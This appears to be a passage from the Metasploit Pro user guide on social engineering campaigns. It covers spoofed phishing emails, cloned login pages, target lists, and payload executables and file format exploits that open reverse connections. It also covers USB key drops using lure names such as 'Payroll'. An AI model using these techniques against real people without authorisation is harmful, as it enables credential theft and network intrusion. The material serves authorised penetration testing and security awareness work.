If you have multiple mail servers that you want to use, and do not want to define a global mail server, you can define the SMTP settings on a per campaign basis. Note: When you set up the SMTP settings from a campaign, Metasploit Pro uses plain authentication to connect to the SMTP server. 1. From within a campaign that contains an e-mail component, click the E-mail Server button. 2. When the Configure Email Server window appears, enter the following information:
E-mail
361
Host - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that SMTP runs on. Typically, SMTP runs on Port 25. Domain - The hosted domain name for your mail server (e.g., domain.com) Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server.
3. Click the Save button.
Creating an E-mail
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup. 3. Click the Add e-mail, web page, or portable file button. 4. Click the E-mail button. 5. When the e-mail configuration window appears, enter the following header information:
l
Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address. From Name - The senders name.
6. Click the Target list dropdown and choose a target list. 7. Click Next to continue to the E-mail Content window. 8. When the E-mail Content window appears, you need to create the body for the e-mail. Choose one of the following options:
l
Insert content from a template - Click the Template dropdown menu and choose the template that you want to apply. Create your own content - Use the plain text or rich text editor to create the e-mail body. You can insert any of the custom attributes to auto-fill the e-mail with data from the target list. For example, you can use the first_name attribute to insert the human targets first name in the e-mail.
9. Click Save to save the e-mail component. At any time, you can click on the Preview tab to see a generated preview of the current e-mail.
Web Page
A web page is an HTML page that a human target can access online. The web page can be an online form that solicits information or it can be a simple message to the target that they should have not opened the link. It can also be a web page that serves an exploit or file to a human target.
Web Page
362
To design a web page, you must create the HTML code for the web page. You can create the HTML body of a web page by manually writing the HTML code or by cloning an existing web page. The easiest and recommended way to create a web page is to clone one. For example, if you want to create a spoofed website based on your companys web page, you can clone it to make a copy of the web page for your campaign. Metasploit Pro copies the HTML to the campaign, which you can edit if there are any tweaks that you want to make to the web page. The web page is assigned a URL, which is based on the web server that you configure for the campaign. This is the URL that you send to the human targets. If you plan to reuse the web page in other campaigns, you can create a web page template. A web page template contains predefined and preformatted HTML content that you can use to quickly create a web page. After you create the web page template, you will be able to apply it to a web page in any campaign within the project.
Web Page Options

The following options are available for you to configure for the web page component:
l
Name - The name of the web page component. Path - The URL path to the web page. Attack Type - The social engineering attack type that the web page launches, such as a phishing attack or file format exploit. Content - The HTML content for the web page. Template - Wraps the content you define in the campaign text editor with a template you have previously created. Clone Website - Clones the web page content from a website. StripJavaScript - Removes Javascript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site. Set referer - Sets the HTTP referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the site administrator as a user that browsed to the website (e.g., http://www.company.com/home). Set user agent - Sets the user agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser. Resolve relative URLs - Resolves any relative URLs to absolute URLs in the cloned HTML. Since Metasploit Pro does not serve assets or images locally, links to images and files must be absolute URLs. If you clone a website, you should enable this option so that the URLs resolve to valid links and render properly on the web page.
Web Page
363
Creating a Web Page

2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup. 3. Click the Add e-mail, web page, or portable file button.
4. Click the Web Page button.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URLpath name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URLis http://www.mycompany.com/support. 6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page. 7. Click the Attack Type dropdown and choose a social engineering attack method. 8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
Web Page
364
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
l
Apply a web page template - To apply a web page template, click the Template dropdown and choose the template that you want to apply to the web page. When you apply a template, Metasploit Pro uses the predefined content to create the web page. Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain a web form. For example, web pages that have login fields or prompt the user for sensitive information are good web pages to clone.
11. When you finish adding the web page content, click the Save button to save the web page component.
Cloning an Existing Web Page

2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
3. Click the Add e-mail, web page, or portable file button.
Web Page
365
4. Click the Web Page button.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URLpath name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URLis http://www.mycompany.com/support.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
Web Page
366
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, click the Clone Website button.
11. Enter the URL of the web page that you want to clone in the URL to clone field.
12. Choose any of the following options to customize the cloned web page:
l
Strip Javascript - Removes Javascript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site. Set referer - Sets the HTTP referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the sites administrator as a user that browsed to the website (e.g., http://www.company.com/home).
Set user agent - Sets the user agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser. Resolve relative URLS - Resolves any relative URLS to absolute URLs in the cloned HTML. This option is selected by default.
Web Page
367
13. Click the Clone button. Metasploit Pro copies the HTML from the web page and displays it in the Content window. 14. Click the Save button to save the web page component.
Redirect Pages
A redirect page is the web page that you forward the human target to after they submit data on a phishing site. A redirect page can be a simple web page that displays a warning message to the human target or it can redirect human target to another web form. For example, the redirect page can display a security warning like This was a social engineering test. Please do not open any e-mails from sources that you do not trust. Additionally, a redirect page can be a web page that delivers an exploit, runs Browser Autopwn, or serves a Java signed applet to the human target. If you intend to use a redirect page in your campaign, you must create it before you create the landing page that the human target initially visits. If you do not create the redirect page first, you will not be able to set a redirect page for the landing page. To create a redirect page, you use the same steps as you would to create a regular web page.
Web Page
368
Portable File
A portable file refers to an executable file or file format exploit that you can save to an external storage device. You create portable files when you want to send a malicious file to a human target using a delivery method other than e-mail. Portable files are most commonly used in USB key drops, but you can also save them to CD-ROMs or any other storage device. A portable file is a campaign component and is created as part of a campaign. The portable file component generates a downloadable file that contains an embedded payload. The delivered payload establishes the connection between the victims machine and the attacking machine.
Portable File Options

The following options are available for you to configure for the portable file component:
l
Name -The name of the USB key component. Listener Callback IP - The IP address that the attacking machine uses to listen for a connection. Listener Callback Port - The port that the attacking machine uses to listen for a connection. Payload Type - The type of payload that the executable file delivers to the target. Filename - The name for the executable file that Metasploit Pro creates.
Limit on Portable File Components

There is no limit on the number of portable files that you can have as part of a campaign.
Listening Port Distribution

Metasploit Pro systematically assigns the LPORT so that a port conflict does not occur between the portable file components. When you create the portable file component, Metasploit Pro searches through ports 1,024-65,535 to identify ports that are available. It automatically assigns the first available port that it finds to the portable component and blocks off that port so that it does not reassign the same port.
Creating a Portable File

2. When the Manage Campaigns page appears, click the Configure a Campaign tab.
Portable File
369
3. In the Name field, enter a descriptive name for the campaign. For example, USB-PayrollEXE helps you quickly identify the campaign type and the executable file name. 4. Select the Custom Campaignsetup.
5. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears.
6. Click the Portable File button.
Portable File
370
7. When the Portable File configuration window appears, enter the following information:
l
Component name - The name of the campaign component. This name displays under the portable file button on the campaign configuration page. File name - The name of the file that Metasploit Pro generates for you. The file name should include the file extension. If you do not supply the correct extension for the file, the exploit will not run on the targets machine.
8. Choose one of the following portable file types:

l
Executable file - Metasploit Pro generates an executable file that delivers the generic payload handler (exploit/multi/handler) to the human target. No further action is needed if you choose to generate an executable file. Click Save to save the component configuration and to exit the configuration window. File format exploit - Metasploit Pro generates a malicious file for you to deliver the exploit to the human target. If you choose to generate a file format exploit, the Module Search page will appear. You will need to search for the module that you want to use and configure the settings for the exploit. Save the module configuration and the portable file component configuration when you are done.
9. Save the campaign when you are done.
Downloading a Portable File

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, find the campaign that contains the executable file that you want to download. 3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign. 4. Locate the component that contains the file that you want to download. 5. Click the Download link. 6. Save the file to a location on your machine.
Renaming the Portable File

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, find the campaign that you want to edit. 3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign. 4. Find the portable file component that you want to rename and click on the button. 5. When the Portable file configuration window appears, enter the new name for the portable file in the Name field. 6. Click Save to save your changes.
Portable File
371
Reusable Campaign Resources

A reusable campaign resource is a reusable file that you can share across campaigns that are in the same project. It refers to a web page template, e-mail template, or target list. The following sections describe the different types of reusable campaign resources.
Target Lists
A target list defines the targets that you want to e-mail the social engineering attack. You can either manually create the target list from within a campaign or you can import a CSV of targets. A target list is project specific and is only accessible to the campaigns that are part of the project.
Creating a Target List

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, click the Manage Reusable Resources tab.
3. Click the New Target List button.
4. When the Upload Target List page appears, enter a name for the target list in the List Name field.
Reusable Campaign Resources
372
5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add.
6. Click the Add (+) button to continue to add additional human targets. 7. When you are done, click the Save button.
Creating a CSV File of Human Targets

To create a CSV file of human targets, you can use a text editor or spreadsheet editor. The CSV file must define the header row and the contact information for each human target. Each row of data must contain comma separated values, and each line of data must be separated by a line break. The header row that you must include in the CSV file is email_address, first_name, last_ name.
Creating a CSV with a Text Editor

1. Open a text editor like Notepad. 2. Add the header row: email_address,first_name,last_name. email_address,first_name,last_name 3. Next, enter the text data that you want the file to contain. The data must follow the same format as the header: e-mail address, first name, and last name. Remember to use a comma to separate each field. email_address,first_name,last_name jsmith@metasploit.com,john,smith 4. Separate each row with a new line. email_address,first_name,last_name jsmith@metasploit.com,john,smith dthomas@metasploit.com,dean,thomas 5. Save the file when you are done.
Target Lists
373
Creating a CSV with a Spreadsheet Editor

1. Open a spreadsheet editor, like Microsoft Excel. 2. Add the following column headers: email_address, first_name, and last_name. 3. Add the e-mail address, first name, and last name for each human target to a row in the spreadsheet. The information for each human target needs to be on a separate row. 4. When you are done, save the spreadsheet as a CSV file.
Importing a Target List

1. From within a project, click on the Campaigns tab. 2. When the Campaigns page appears, click on the Manage Reusable Resources tab. 3. Click the Resource dropdown and chooseTarget Lists. 4. Click the New Target List button. 5. When the Upload Target List page appears, click the Browse button. 6. Navigate to the location of the CSV file. 7. Select the CSV file and click the Open button. 8. Click the Save button.
Adding a Target to a Target List

1. From within a project, click on the Campaigns tab. 2. When the Campaign page appears, click on the Manage Reusable Resources tab. 3. When the Resources page appears, click the Resources dropdown and select Target Lists. 4. Click on the target list that you want to edit. 5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add. 6. Click the Add (+) button to continue to add additional human targets. 7. When you are done, click the Submit button.
Deleting a Target List

1. From within a project, click on the Campaigns tab. 2. When the Campaigns page appears, click on the Manage Reusable Resources tab. 3. When the Resources page appears, click on the Resource dropdown and choose Target Lists. 4. Select the target list that you want to delete.
Target Lists
374
5. Click the Delete button. 6. Click OK to confirm that you want to delete the target list.
Templates
A template is a preformatted and reusable set of content you can apply to an e-mail or web page. It is essentially a wrapper that wraps around the web page or e-mail content. You can use a template to instantly add content or formatting to a web page or e-mail. A template is project specific and cannot be accessed globally.
Web Templates
A web template defines optional pre-existing HTML code that you can use to wrap around the content of a web page component. Typically, a web template defines stylistic design elements and generic information that you can tailor to a specific target when you build the actual web page. The purpose of a web template is to provide reusable presentation logic that you can share between campaigns that are part of the same project. For example, if you intend to use a spoofed version of your companys web page for the majority of your campaigns, you should create a web template of your companys site. This enables you to quickly build a web page based on an existing template and customize the web page according to your needs.
Web Template Requirements

When you create the web template, the body must contain the {{ web_page_content }} attribute, which inserts the content that you create in the actual web page component into the web page. If the web template does not contain the {{ web_page_content }} attribute, you will not be able to save the web template.
Creating a New Web Page Template

1. From within a project, click the Campaigns tab. 2. When the Campaigns page appears, click the Manage Reusable Resources tab. 3. From the Resources dropdown, select Web Templates and click the New Web Template button. 4. When the New Web Template page appears, enter a name for the template in the Name field. 5. In the content editor, enter the HTML that you want the web template to use. By default, Metasploit Pro defines the DOCTYPE declaration for you: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Templates
375
6. When you create the HTML, you need to make sure that the web page includes the <html> tag to indicate the start of the web page and the </html> tag to denote the end of the web page. By default, web template includes the <head> element. 7. Additionally, you need to define the title for the web page. By default, the title is Metasploit Pro Social Engineering Web Page. To replace the title with your own title, find the <title> element and replace the text inside the <title> element. You need to replace the title with the title of your web page. 8. When you are ready to create the body of the web page, find the <body> element. The majority of the information for the web page will be defined in the <body> element. For example, you can define the background color and web page text. 9. When you are ready to insert the content from the web page content into the template, click the Insert Custom Attribute dropdown, and select the Web Page Content attribute. This adds the {{ web_ page_content }} tag, which denotes that the content from the web page component should be placed there. 10. When you finish creating the web template, click the Save button.
Creating a Web Page Template from an Existing Web Page

1. From within a project, click the Campaigns tab. 2. Click the Manage Reusable Resources tab. 3. From the Resources dropdown, select Web Templates and click the New Web Template button. 4. When the New Web Template page appears, enter a name for the template in the Name field. 5. Click the Clone Website button. 6. When the Clone Website window appears, enter the URL to the web page that you want to clone in the URL to clone field. 7. Click the Clone button. Metasploit Pro copies the HTML from the web page and imports it into the content editor. At this point, you can make any additional customizations you want to the HTML. For example, you may want to tweak the look and feel of the web page so that it is obvious to the human target that the web page is a spoofed site. 8. When you are done with your modifications, you need to find a place in the <body> element to insert the Web Page Content attribute. This attribute adds the {{ web_page_content }} tag, which denotes that the content from the web page component should be placed there. To insert the Web Page Content attribute, click the Insert Custom Attribute dropdown, and select the Web Page Content attribute. 9. Click the Save button to save the template.
Applying a Web Page Template

1. From within a project, click the Campaigns tab. 2. Either create a new campaign or open an existing campaign to edit it.
Templates
376
3. From the campaign configuration page, add a web page component to the campaign. 4. When the web page configuration page appears, click the Web Page button. 5. When the web page configuration page appears, add the web page ID to the URL path. 6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page. 7. Click the Attack Type dropdown and choose a social engineering attack method. 8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
l
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, click the Template dropdown and choose the web template that you want to apply to the web page. 11. Click the Save button to save the web page.
Deleting a Web Template

1. From within a project, click the Campaigns tab. 2. Click the Manage Reusable Resources tab. 3. From the Resource dropdown, select Web Templates. 4. When the Web Templates page appears, select the web template that you want to delete. 5. Click the Delete button. 6. Click OK to confirm that you want to remove the template from the campaign.
E-mail Templates
An e-mail template defines a message or the HTML code that you can insert into an e-mail. An e-mail template contains optional HTML code that you can use to wrap the content of individual e-mail components.You should create an e-mail template for content that you want to reuse between campaigns that are within the same project, such as logos, banners, and footers. For example, you can create an e-mail template that contains a message that tells a victim to update their account information. The template content can contain a message like the following: This is a friendly reminder to update your account passwords.
E-mail Templates
377
Or if you have a footer or logo that you want to reuse across multiple e-mails, you can create an e-mail template that contains the footer or banner information. So, when you create the e-mail, you can simply apply the e-mail template in order to insert the logos and banners that you need.
E-mail Template Example

Hi {{first_name}}, Our company prides itself in taking a proactive approach to security. We regularly perform routine checks to ensure that our employees accounts are up to date with the strongest and most secure passwords. {{email_content}} Thank you for reading. Sincerely, Your IT team <http://www.rapid7.com/img/global/logo.png>
E-mail Template Editors

Metasploit Pro provides an HTML and plain text editor for you to use to create content for the e-mail body.
l
HTML Editor - The HTML editor is an editing interface that you use to create the content for an e-mail template. It includes a built-in toolbar for text formatting, which makes it possible for you to create email content without any HTML knowledge. Text Editor - The text editor is an editing interface that you use to create the content for an e-mail template. Unlike the HTML editor, it does not include a formatting toolbar. Instead, you must have prior knowledge of HTML to create e-mail content.
E-mail Template Requirements

When you create the e-mail body for an e-mail template, it must contain the {{email_content}} attribute. This attribute inserts the e-mail body that you create in the actual e-mail component into the email. You cannot apply an e-mail template unless it contains the {{email_content}} attribute.
Creating an E-mail Template

1. From within a project, click the Campaigns tab. 2. Click the Manage Reusable Resources tab. 3. From the Resources dropdown, select E-mail Templates and click the New E-mail Template button. 4. When the New E-mail Templates page appears, enter a name for the template in the Name field.
E-mail Templates
378
5. Click the Insert Custom Attribute dropdown, and select the E-mail Content attribute. 6. Under the {{email_content}} attribute, enter the e-mail body for the template. 7. When you finish creating the e-mail content, click the Save button.
Deleting an E-mail Template

1. From within a project, click the Campaigns tab. 2. Click the Manage Reusable Resources tab. 3. From the Resource dropdown, select E-mail Templates. 4. When the E-mail Templates page appears, select the e-mail template that you want to delete. 5. Click the Delete button. 6. Click OK to confirm that you want to remove the template from the campaign.
Malicious Files
A malicious file refers to a custom user supplied file that you can use in a campaign to exploit a target machine. Examples of a malicious file include custom written scripts, executables, or payloads. To deliver a malicious file to a human target, you must first upload the file to the project. Once the malicious file is uploaded, you can use either an e-mail or web page to deliver the malicious file to the human target. Each of these campaign component provides an option to attach a user supplied file to it.
Attaching a Malicious File to an E-mail

1. From within a project, click the Campaigns tab. 2. Click the Configure a Campaign tab. 3. In the Name field, enter a name for the campaign. 4. For the setup option, choose Custom Campaign. 5. Click the Add e-mail, web page, portable file button. 6. Click the E-mail button. 7. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page. 8. In the Subject field, enter a subject for the e-mail. 9. In the From address field, enter the e-mail address that the campaign is trying to spoof. 10. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from.
Malicious Files
379
11. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to. 12. From the Attack type dropdown, choose the Attach file option. 13. In the Attachment file name field, enter the name of the malicious file you want to deliver to a human target. The file name must include the file extension. For example, if you are attaching a PDF, the file name should include the PDF extension. 14. From the File generation type options, choose User supplied file. 15. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use. 16. Click the Next button to create the e-mail body. 17. After you create the e-mail body, click the Save button to close the e-mail configuration window. 18. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window. 19. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
Serving a Malicious File through a Web Page

1. From within a project, click the Campaigns tab. 2. Click the Configure a Campaign tab. 3. When the new campaign configuration form appears, enter a name for the campaign in the Name field. 4. For the setup option, choose Custom Campaign. 5. Click the Add e-mail, web page, portable file button. 6. Click the Web Page button. 7. When the e-mail configuration window appears, enter the URL that you want the web page to use in the Path field. By default, Metasploit Pro uses the IP address of the Metasploit instance for the web pages domain; however, you can change this when you configure the settings for the web server. 8. In the Component name field, enter a name for the web page component. This is the name that displays for the component on the campaign configuration page. 9. From the Attack type dropdown, choose the Serve File option.
Malicious Files
380
10. From the File generation type options, choose the User supplied file option. 11. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use. 12. Click the Next button to create the web page content. 13. After you create the web page content, click the Save button to close the web page configuration window. 14. From the campaign configuration page, click the Web Server button. 15. When the web server configuration window appears, select the host name that you want to use to host the web page. 16. In the Listening Port field, enter a port that is commonly used for HTTP traffic, such as ports 80 or 8080. 17. Click the Save button to save your changes and to close the web server configuration window. 18. Now that you are back on the campaign configuration page, you need to create an e-mail to deliver the web page URL to the human targets. 19. From the Campaign Components area, click the Add e-mail, web page, portable file button. 20. Click the E-mail button. 21. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page. 22. In the Subject field, enter a subject for the e-mail. 23. In the From address field, enter the e-mail address that the campaign is trying to spoof. 24. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from. 25. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to. 26. From the Attack type dropdown, choose None. 27. Click the Next button to create the e-mail body. 28. After you create the e-mail body, click the Save button to close the e-mail configuration window. 29. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can go ahead and click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server.
Malicious Files
381
30. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window. 31. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
Malicious Files
382
USB Key Campaigns

USB key dropping is a social engineering tactic that can be used to obtain sensitive information or remote access to a human targets computer. A social engineer or penetration tester may want to leverage USB key drops to raise security awareness, ensure adherence to security procedures, and improve defense strategies within an organization. Typically, the attacker places a malicious file or executable onto the USB key and drops the key off in a high traffic area like the breakroom. If someone finds the key and installs the device on their system, the malicious file will run if the autorun feature is implemented or it will run when the person clicks on the executable file. When the file runs, it delivers a payload that could potentially open a backdoor on the human targets machine. If a session successfully opens on a victims machine, an attacker can take control of it to attack other machines on the network, capture data, and escalate privileges. To create a USB key drop, you need to set up a portable file campaign that contains an executable.
Executable Files
An executable is a portable file that delivers the embedded generic multi-handler payload to a victims machine. The payload creates a reverse connection over HTTPS from the victims machine to the multihandler listener that is running from a campaign. When the multi-handler listener receives the incoming connection, it delivers the remaining payload to the victims machine. After a connection has been established between the two machines, you can take control of the session to gain further access into the network or to gather information from victims machine. To set up the handler, you need to specify the listener port, or LPORT. Metasploit Pro uses the LPORT that you assign and the local Metasploit instance as the callback IP address to configure the handler.
Generating an Executable File

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, click the Configure a Campaign tab. 3. When the campaign configuration form appears, enter a descriptive name for the campaign in the Name field. For example, USB-Payroll helps you easily identify the campaign type and the executable file name. 4. Select the Custom Campaign option. 5. Click the Add e-mail, web page, portable file button. A set of campaign components appears. 6. Click the Portable File button. 7. In the Component name field, enter a unique name for the portable file component. This name displays under the portable file icon on the campaign configuration page.
USB Key Campaigns
383
8. In the Generated file name field, enter a name for the executable file. This is the file name that the human target sees when they look at the contents of the USB drive. You want to give the file a name that entices the user to click on it. For example, a name like Payroll or Company Bonuses may work well. 9. In the Listener Host field, enter the callback IP address you want to the payload use. By default, the callback IP is the address of your Metasploit server. 10. In the Listener Port field, enter the callback port that you want the payload to use. By default, the callback port is 1024. 11. Select the Payload type for the executable file. 12. Verify that Executable file is selected as the File generation type. 13. Save the executable. 14. When the Configure a Campaign area reappears, you will see a Download link located beneath the USB Key icon. Click the Download link and save the executable file to a location on your local machine. The Desktop or Downloads folder is a good location. 15. Click the Launch Campaign button to start the campaign. The campaign must be online in order for you to get a session on the human targets system. 16. Insert your USB key into your USB port and move the executable over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic volume or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms. This increases the chances of someone finding the USB key and installing it on their system. If you are able to successfully create a backdoor on the victims machine, you can use it to pivot to other machines on the network and collect information from the victim.
Downloading an Executable File

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, find the campaign that contains the executable file that you want to download. 3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign. 4. Locate the component that contains executable that you want to download. 5. Click the Download link. 6. Save the file to a location on your machine.
Executable Files
384

A file format exploit takes advantage of a vulnerability that exists in the way that an application processes data in a particular file format, such as PDF, DOC, or JPEG. Most file format exploits are malicious files that are delivered to a human target through e-mail or an external storage device, such as a USB key. A file format exploit enables you to create a single malicious file, such as a PDF, and use that file to compromise systems regardless of the operating system. A file format exploit runs when a human target opens the malicious file, and if their system is vulnerable to the exploit, you will be able to obtain shell access to their machine. For example, you can create a PDF that contains an exploit, like the Adobe CoolType exploit. When a vulnerable target opens the PDF, the payload runs and creates a session between the targets machine and the attacking machine.
Generating a File Format Exploit

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, click the Configure a Campaign tab. 3. When the campaign configuration page appears, enter a descriptive name for the campaign in the Name field. For example, USB-Payroll helps you easily identify the campaign type and the executable file name. Select the Custom setup. 4. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears. 5. Click the Portable File button. 6. Enter a unique name for the portable file component. This name displays under the portable file icon on the campaign configuration page. 7. Enter a name for the generated file. This is the file name that the human target sees when they look at the contents of the USB drive. For example, if you are generating a malicious PDF, you can specify a name like Corporate_Bonuses_2012.PDF or John_Smith_Resume.PDF. 8. Select File format exploit for the File generation type. A list of available file format exploits appears. 9. Use the search field to narrow down the list of exploits. For example, if you are searching for the Adobe CoolType exploit, you can search for name:cooltype. The keyword tag, name, specifies that you want to search for the keyword, cooltype, in the modules name. 10. When you find the exploit that you want to use, click on the module name. The module configuration page appears. 11. You can modify any of the exploit settings, such as the payload and connection type, but it is recommended that you use the default configuration for the exploit. 12. Click OK to apply the module configuration. 13. Save the file format exploit.
385
14. When the campaign configuration area reappears, you will see a Download link located below the campaign component icon. Click the Download link and save the file to a location on your local machine. The Desktop or Downloads folder is a good location. 15. When you are ready to start the campaign, click the Launch Campaign button. The campaign must be online in order for you to get a session on the human targets system. 16. Insert your USB key into your computer and move the file over to your USB drive. The USB key is now ready for you to drop off. You should select a area that has high traffic or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms.
Downloading a File Format Exploit

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns page appears, find the campaign that contains the file format exploit that you want to download. 3. Click the Edit link. The campaign configuration page appears and displays components that are part of the campaign. 4. Locate the component that contains file that you want to download. 5. Click the Download link located below the component. 6. Save the file to a location on your machine.
386
Phishing Campaigns
Phishing is a social engineering technique that attempts to acquire sensitive information from a human target. During a phishing attack, a human target receives an e-mail disguised as an e-mail from a trusted source. The spoofed e-mail contains a tracking link that opens an authentic looking web page, which contains a web form that you want the human target to fill out. If the human target fills out and submits the form, you can capture their information and use it as evidence. Phishing is a good way for you to test the following issues:
l
The security perimeter, e-mail infrastructure, and client-side safety measures prevent unauthorized access and malicious activity. The security awareness and training programs effectively teach employees how to identify and prevent a phishing attack.
How a Phishing Campaign Works

When a phishing campaign starts, Metasploit Pro sends the e-mail to the target list through your mail transfer agent (MTA). The e-mail contains a tracking GIF that detects when a human target opens the email. If the human target clicks on the link in the e-mail, the tracking GIF sets a cookie, or unique identifier, that enables the campaign to track the actions of the human target. The unique identifier prevents Metasploit Pro from capturing duplicate data for the same human target. To serve the web page, Metasploit Pro starts a web server on your local system. The web server address is based on the local systems IP address or host name. If you have DNS set up, you can specify the domain name instead. For example, if you are running Metasploit Pro on 192.168.182.6, the human target will see the web page URL as 192.168.182.6/landing_page?d=uniquetrackingstring. To create a phishing campaign, you can either use the Phishing Campaign or the custom campaign. If you intend to create a phishing attack that launches browser autopwn or serves an exploit, you need to use the custom campaign. Otherwise, you can use the Phishing Wizard to create a standard phishing attack with a landing page and redirect page.
Before You Create a Phishing Campaign

Before you create a phishing campaign, you need to perform the following tasks:
l
Set up the global SMTP settings - To access the global settings, select Administration > Global Settings from the main menu. Find the SMTP settings and enter the information for your SMTP server. Verify that your local machine can reach the Internet - Metasploit Pro must be able to access the Internet in order to clone a web page.
Phishing Campaigns
387
Create or import target lists - The target list defines the e-mail addresses of the human targets that you want to send the phishing e-mail. You can create the target list from within the Phishing Wizard, but it is recommended that you set up your target lists before you create a campaign.
Creating a Phishing Attack

Metasploit Pro provides a canned phishing campaign that you can use to create a phishing attack. The phishing campaign contains all the components that you need to set up a phishing attack as well as many default, canned settings that you can use to quickly get up and running. When you first access the canned phishing campaign, the campaign will contain a web page component called Landing Page, an e-mail component, an e-mail server, and a web server. A second web page component will be added after you configure the Landing page if you opt to create a redirect web page rather than use a real web page. Each component is represented by a campaign button that provides access to the components configuration forms. When you click on a campaign button, a modal window appears and shows you the fields and options that you can configure for the component. The modal window provides step-by-step guidance to show you how to configure the campaign component and validates the component before saving it.
Creating a Phishing Campaign

1. From within a project, click the Campaigns tab. The Manage Campaigns page appears. 2. Click the Configure a Campaign tab. 3. In the Name field, enter a descriptive name for the campaign. The name of the campaign should help you easily identify the campaign as a phishing campaign. For example, a name like HR Phishing Scam lets you know that the campaign is a phishing campaign that targets the HR team. 4. Select the Phishing Campaign as the set up option.
Setting Up a Landing Page

1. From the Campaign Components area, click the Landing Pagebutton. 2. When the Web Page Configuration window appears, add the name of the landing page to the end of the URL path. This is the complete URL that the human target sees in their browser's address bar. 3. Choose one of the following options to select the redirect page:
l
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign.
388
4. Click the Next button to continue to the Web Page Content window. 5. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
l
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
6. Click the Save button to save the web page component.
Setting Up a Redirect Page

